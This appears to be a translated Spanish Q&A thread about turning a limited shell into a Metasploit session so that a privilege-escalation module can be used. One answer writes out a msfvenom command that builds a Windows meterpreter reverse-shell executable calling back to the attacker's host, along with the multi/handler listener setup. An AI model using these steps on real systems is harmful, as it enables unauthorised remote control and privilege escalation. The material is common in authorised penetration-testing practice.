Necesita un ID de sesión para que funcione un módulo MSF de escalada de privilegios

3

Tengo un shell limitado en una máquina y me gustaría usar un módulo Metasploit para escalar privilegios. Problema: no obtuve el shell limitado con un módulo de metasploit, y el módulo de metasploit para la escalada solicita un ID de sesión.

Mi pregunta es: ¿cómo puedo convertir mi shell limitado (que obtengo sin metasploit) en una sesión de metasploit?

    
pregunta adrTuIPKJ44 19.10.2016 - 14:55
fuente

2 respuestas

2

Puede generar un ejecutable específico de la plataforma con msfvenom. Por ejemplo:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<yourport> -f exe > meter.exe

Traes ese exe al objetivo a través de tu shell limitado. A continuación, inicia un oyente en metasploit:

use exploit/handler/multi (or exploit/multi/handler, don't remember)
set payload windows/meterpreter/reverse_tcp (needs to be the same as above)
set LHOST <your ip>
set LPORT <your port> (these 2 need to be the same as above)
run

y después de eso, inicia el exe en el objetivo. Entonces deberías obtener una sesión de meterpreter. Déjame saber si todavía no funciona.

    
respondido por el kaidentity 19.10.2016 - 15:03
fuente
1

Ok, finalmente lo hice. Intentaré explicar lo que hice.

Quería obtener un shell de meterpreter en una máquina en la que ya podía tener un shell (pero sin Metasploit). La razón por la que quería un shell de meterpreter es porque necesito una sesión Metasploit para usar un Módulo Metasploit para la escalada de privilegios.

Así que quería usar mi shell php_reverse para máquinas con Windows (que no es un .exe sino un php y funciona solo en máquinas con Windows) con Multi / Handler, pero no es posible (y no hay equivalente en la biblioteca Metasploit, Lo he comprobado varias veces).   Así que finalmente subí una https_reverse_shell en formato .exe y pude usar Multi / Handler.

    
respondido por el adrTuIPKJ44 19.10.2016 - 16:04
fuente

Lea otras preguntas en las etiquetas